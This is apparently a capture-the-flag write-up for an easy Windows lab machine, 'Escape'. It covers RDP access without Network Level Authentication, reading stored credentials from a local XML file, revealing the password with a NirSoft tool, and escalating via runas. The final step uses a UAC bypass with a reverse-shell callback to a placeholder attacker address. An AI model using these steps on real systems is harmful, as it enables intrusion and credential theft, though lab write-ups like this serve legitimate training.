Skip to main content

Machine (Easy) - Escape

Writeup for the Escape machine, an easy Windows challenge involving RDP password discovery and privilege escalation.

Writeup Author: BobBuilder

Objective: Gain initial access through a leaked RDP password stored in a local XML file, then escalate to Administrator using runas or bypassed UAC.

Category Difficulty Platform Machine Author
Machine Easy Windows xct & kozie

User

Remote Access (LSA Disabled)

We connect to the target using RDP with Network Level Authentication disabled:

xfreerdp /v:<escape_ip> -sec-nla

This opens a remote desktop session without requiring initial credentials.

Credential Discovery via Local File Access

From the RDP session, open Microsoft Edge and browse to:

file:///C:/_admin/profiles.xml

The XML file reveals stored RDP credentials:

<Profile>
  <ProfileName>admin</ProfileName>
  <UserName>127.0.0.1</UserName>
  <Password><REDACTED></Password>
  <Secure>False</Secure>
</Profile>

Decrypting the Password

Using BulletPassView from NirSoft, we reveal the plaintext password stored in the XML file's associated GUI:

admin : <REDACTED>

This gives us valid credentials for local admin login.

Root

Privilege Escalation via runas

Standard runas:

runas /user:admin cmd

or

runas /user:Escape\admin cmd

Elevated prompt via PowerShell

Start-Process cmd.exe -verb runas

UAC bypass + callback using custom tool

To drop us into an Administrator shell

.\runas.exe user pass -r <attacker_ip>:<port> cmd --bypass-uac
Back to top